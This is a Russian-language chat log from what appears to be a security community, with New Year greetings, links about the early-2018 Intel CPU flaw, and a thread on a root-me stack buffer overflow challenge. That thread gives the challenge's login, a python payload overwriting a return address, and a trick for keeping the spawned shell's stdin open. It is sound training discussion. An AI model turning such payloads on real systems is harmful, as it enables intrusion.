
ViolentOr
31.12.2017
22:07:20

.
31.12.2017
22:07:35
С какой стороны от МЦК?

ViolentOr
31.12.2017
22:08:44
Северо-западнее
От насыпи как раз начинается

Google

Юрий
31.12.2017
22:15:49
Дорогой DC, я рад что ты так долго со мной, с праздником тебя! Верь в себя и все получится!

Дуров
31.12.2017
22:37:41
Я желаю всем развиваться в любом плане в Новом Году! А также не трепать себе нервы, оно того не стоит!

Blank
31.12.2017
22:57:42
с новым, 20!8 годом, друзья!

Dotbot
31.12.2017
23:07:05
Надеюсь случится чудо и нас не забанят админы за флуд:D

shadowsoul
31.12.2017
23:09:10
мне львень вас банить

Nemo
31.12.2017
23:10:23
В Нью Йорке только 6 вечера, мы готовимся . А весь чатик хочу поздравить с наступившим, пусть все мечты сбудутся

Nega
31.12.2017
23:25:40
С новым годом!

Andrew
01.01.2018
00:10:13
всех с нг

SKIZO
01.01.2018
00:11:19
Безудержное веселье :D
С Новым годом!)

Andrew
01.01.2018
00:13:43
у нас уже 6 утра) дооолгая ночь

Google

SKIZO
01.01.2018
00:14:33
А, тогда ясно))

ge0gr4f
01.01.2018
01:11:27
С Новым годом! Я выжил! ?

the29a
01.01.2018
12:41:36
Не надо так.

f1nnix
01.01.2018
13:52:08
Если поставить друг на друга, можно сделать елочку!

shadowsoul
01.01.2018
14:40:21
ойфыр

Knuckles
01.01.2018
14:48:52
1488?)

shadowsoul
01.01.2018
14:49:11
ты лопнешь

Dotbot
01.01.2018
14:49:59

Maxim
01.01.2018
14:52:39
Hint: елку лучше строить из пустых бутылок

Dotbot
01.01.2018
14:53:19
Hint N2: термоклей выручит всегда

Keddad
01.01.2018
14:53:51
Hint N3: выбрасывать ее не обязательно

Ksadrix
01.01.2018
14:56:14

Keddad
01.01.2018
14:56:29
Кх, вы ничего не видели

Dotbot
01.01.2018
14:56:40
Майору не нужно тащить свою бутылку)

Keddad
01.01.2018
14:56:47
Не знаю, какой майор

Ksadrix
01.01.2018
14:57:12

Keddad
01.01.2018
14:57:44
Да, коне.. О каком майоре вы говорите? Я простой туристо, русский nicht sprechen

Ksadrix
01.01.2018
14:59:57
@Le0p01d оперативно отработано. Я, кстати, так ничего не видел

Blank
01.01.2018
15:01:36

Google

Blank
01.01.2018
15:01:41
ничего не понимаю

SKIZO
01.01.2018
15:18:31

Giperion
03.01.2018
15:24:37
Кто то знает подробности?
Разбирать каракули Торвальдса - сомнительное удовольствие, сделаю это в последнюю очередь
Тьфу, не та статья, прошу прощения
https://geektimes.ru/post/297003/

qap
03.01.2018
16:30:35
"Детали уязвимости находятся под эмбарго до тех пор, пока не будут выпущены исправления, которое намечается на середину января 2018 года"
https://www.opennet.ru/opennews/art.shtml?num=47849

Pavel
03.01.2018
16:55:58
тут в оригинале
когда видишь словосочетание "A fundamental design flaw in Intel's processor chips", понимаешь, что все действительно ОЧЕНЬ плохо
https://www.theregister.co.uk/2018/01/02/intel_cpu_design_flaw/

Pavel
03.01.2018
17:20:25
Коллеги, в 64 битной архитектуре процессора х68, nop как и в 32 битной имеет опкод 0х90?

Admin
ERROR: S client not available

Blank
03.01.2018
17:20:45

Pavel
03.01.2018
17:20:56

Blank
03.01.2018
17:21:00
да вроде всё работает, да

Pavel
03.01.2018
17:21:42
Странно, ну ладно, разберусь

Alexey
03.01.2018
17:36:25
http://archive.is/R5Rpp

Pavel
03.01.2018
17:52:19
решал кто "ELF x64 - Stack buffer overflow - basic" на root-me?

napster
03.01.2018
18:35:34

Google

Pavel
03.01.2018
18:41:47
ssh -p 2223 app-systeme-ch35@challenge03.root-me.org pass:app-systeme-ch35
есть функция:
void callMeMaybe(){
setreuid(geteuid(), geteuid());
system("/bin/bash");
}
Удаётся переполнить стек и адрес возврата перезаписать на адрес этой функции, но шелл не вызывается, вместо этого вся функция исполняется, доходит до ret и улепётывает по непонятному адресу и там благополучно падает. Тестил и в gdb и без него. Вопрос в следующем, почему так происходит?

napster
03.01.2018
18:47:59
А как ты скармливаешь пэйлоад программе ?

Pavel
03.01.2018
18:49:15
пейлоад:
python -c "print '\x5b'*280+'\x40\x06\xcd'[::-1]+'\x00\x00\x00\x00'" > /tmp/<спойлеры>/buf
передаю так: ./ch35 < /tmp/<спойлеры>/buf
в gdb так: r < /tmp/<спойлеры>/buf

napster
03.01.2018
18:50:34
Попробуй так : cat < (python -c "lalala") - | ./ch35

Pavel
03.01.2018
18:52:52
сработало, спасибо, можешь объяснить почему так произошло?
с EOF наверное какая то магия
помню на picoctf 2013 такая же магия была, вот только тогда не разобрался и из-за этого спустя столько лет опять на это наткнулся, баран я...

napster
03.01.2018
19:00:16
Без cat у тебя stdin закрывается, нужно держать его открытым.
Чтобы потом вводить команды шелу

Pavel
03.01.2018
19:01:38
понятно, спасибо))

)3)2☣(V)
03.01.2018
19:05:17
А что по пятнице, доклады будут?

Vladimir
03.01.2018
21:46:44
Да ладно обойдется все
Если хрень не качать
И типа если домащний пк не особо жалко)

Altai
03.01.2018
22:01:45
https://newsroom.intel.com/news/intel-responds-to-security-research-findings/
Краткий пересказ